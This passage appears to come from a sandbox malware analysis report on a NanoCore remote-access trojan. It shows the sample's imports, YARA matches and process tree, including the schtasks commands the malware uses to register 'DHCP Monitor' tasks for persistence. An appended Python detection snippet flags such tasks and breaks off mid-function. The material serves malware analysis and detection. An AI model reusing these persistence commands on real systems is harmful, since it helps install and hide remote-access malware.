          KERNEL32.dll: CloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
          USER32.dll: ScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
          GDI32.dll: SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
          SHELL32.dll: SHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
          ADVAPI32.dll: RegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
          COMCTL32.dll: ImageList_AddMasked, ImageList_Destroy, ImageList_Create
          ole32.dll: OleInitialize, OleUninitialize, CoCreateInstance
          VERSION.dll: GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

          Possible Origin

          Language of compilation system | Country where language is spoken
          English                        | United States

          Network Behavior

          Network Port Distribution

          TCP Packets


          UDP Packets


          DNS Queries


          DNS Answers


Code Manipulations

Statistics

Per-process charts: CPU Usage, Memory Usage, High Level Behavior Distribution, Behavior

          System Behavior

          General

          Start time:01:07:54
          Start date:09/04/2021
          Path:C:\Users\user\Desktop\nanocore.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\nanocore.exe'
          Imagebase:0x400000
          File size:321222 bytes
          MD5 hash:08803CC817D8B1046A964AF11685B15C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000001.00000002.651116412.000000001EEC0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          Reputation:low

          General

          Start time:01:07:55
          Start date:09/04/2021
          Path:C:\Users\user\Desktop\nanocore.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\nanocore.exe'
          Imagebase:0x400000
          File size:321222 bytes
          MD5 hash:08803CC817D8B1046A964AF11685B15C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.909694649.00000000058B0000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.907930500.0000000004A92000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.905801654.0000000002531000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.904977643.0000000000598000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.909667904.0000000005820000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.909667904.0000000005820000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000001.645917465.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.907047589.0000000004970000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000002.00000002.906581049.00000000035AC000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000002.00000002.906581049.00000000035AC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          Reputation:low

          General

          Start time:01:07:59
          Start date:09/04/2021
          Path:C:\Windows\SysWOW64\schtasks.exe
          Wow64 process (32bit):true
          Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp'
          Imagebase:0x1110000
          File size:185856 bytes
          MD5 hash:15FF7D8324231381BAD48A052F85DF04
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:01:08:00
          Start date:09/04/2021
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff724c50000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:01:08:00
          Start date:09/04/2021
          Path:C:\Windows\SysWOW64\schtasks.exe
          Wow64 process (32bit):true
          Commandline:'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp3B81.tmp'
          Imagebase:0x1110000
          File size:185856 bytes
          MD5 hash:15FF7D8324231381BAD48A052F85DF04
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:01:08:00
          Start date:09/04/2021
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff724c50000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          General

          Start time:01:08:01
          Start date:09/04/2021
          Path:C:\Users\user\Desktop\nanocore.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\nanocore.exe 0
          Imagebase:0x400000
          File size:321222 bytes
          MD5 hash:08803CC817D8B1046A964AF11685B15C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000008.00000002.669624228.000000001EEC0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          Reputation:low

          General

          Start time:01:08:02
          Start date:09/04/2021
          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          Wow64 process (32bit):true
          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
          Imagebase:0x400000
          File size:321222 bytes
          MD5 hash:08803CC817D8B1046A964AF11685B15C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.671860077.000000001ED70000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          Antivirus matches:
          • Detection: 34%, ReversingLabs
          Reputation:low

          General

          Start time:01:08:02
          Start date:09/04/2021
          Path:C:\Users\user\Desktop\nanocore.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\nanocore.exe 0
          Imagebase:0x400000
          File size:321222 bytes
          MD5 hash:08803CC817D8B1046A964AF11685B15C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.683529518.0000000000679000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000001.662848703.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.684361480.0000000002510000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.684499268.00000000034FC000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.684499268.00000000034FC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          Reputation:low

          General

          Start time:01:08:03
          Start date:09/04/2021
          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          Wow64 process (32bit):true
          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
          Imagebase:0x400000
          File size:321222 bytes
          MD5 hash:08803CC817D8B1046A964AF11685B15C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.684555433.0000000002320000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.684652674.000000000330C000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.684652674.000000000330C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          Reputation:low

          General

          Start time:01:08:12
          Start date:09/04/2021
          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          Wow64 process (32bit):true
          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
          Imagebase:0x400000
          File size:321222 bytes
          MD5 hash:08803CC817D8B1046A964AF11685B15C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          Reputation:low

          General

          Start time:01:08:13
          Start date:09/04/2021
          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          Wow64 process (32bit):true
          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
          Imagebase:0x400000
          File size:321222 bytes
          MD5 hash:08803CC817D8B1046A964AF11685B15C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.703774283.000000000342C000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.703774283.000000000342C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.703677926.0000000002440000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          Reputation:low
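The process list above records two schtasks.exe invocations, each creating a task ("DHCP Monitor", "DHCP Monitor Task") from an XML definition in the user's %TEMP% directory and each spawned by a binary running from the Desktop; this is the pattern behind the "Scheduled temp file as task from temp location" signature. The following is an added example (not part of the Joe Sandbox report and not the Sigma rule's own code) that applies that logic to process-creation events: it tokenizes a Windows command line, extracts the schtasks switches, and flags /create calls whose /xml path lives in a temp directory. The two command lines are taken from the process list; the parent/image fields and the two benign control events are constructed, and the path patterns are assumptions tuned to the paths in this report.

```python
"""Flag scheduled tasks registered from an XML file in a temp directory.

Added example; the schtasks command lines come from this report, everything
else (events, regexes, switch table) is constructed or assumed.
"""
import ntpath
import re

# Honour "double" and 'single' quotes: Joe Sandbox renders double quotes as
# single quotes in its process listings.
TOKEN_RE = re.compile(r'"([^"]*)"|\'([^\']*)\'|(\S+)')
# Assumed temp locations; add your own if software uses others.
TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\|%temp%", re.I)
# Assumed user-writable launch locations for the parent process.
USER_WRITABLE_RE = re.compile(r"\\Users\\[^\\]+\\(Desktop|Downloads|AppData)\\", re.I)
# schtasks switches that consume the following token as their value.
SWITCHES_WITH_VALUE = {"/tn", "/xml", "/tr", "/sc", "/st", "/ru", "/rp",
                       "/s", "/u", "/p", "/mo", "/rl", "/sd", "/ed"}

# Constructed process-creation events (Sysmon EID 1 / Security 4688 style).
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\user\Desktop\nanocore.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp'"},
    {"parent": r"C:\Users\user\Desktop\nanocore.exe",
     "image": r"C:\Windows\SysWOW64\schtasks.exe",
     "cmdline": r"'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp3B81.tmp'"},
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /create /tn "Nightly Backup" /tr "C:\Program Files\Backup\backup.exe" /sc daily /st 02:00'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks.exe /query /tn "DHCP Monitor"'},
]


def tokenize(cmdline):
    """Split a Windows command line into arguments, stripping either quote style."""
    return [dq or sq or bare for dq, sq, bare in TOKEN_RE.findall(cmdline)]


def analyze_schtasks(cmdline):
    """Return the interesting switches of a 'schtasks /create' call, else None."""
    toks = tokenize(cmdline)
    if not toks or ntpath.basename(toks[0]).lower() != "schtasks.exe":
        return None
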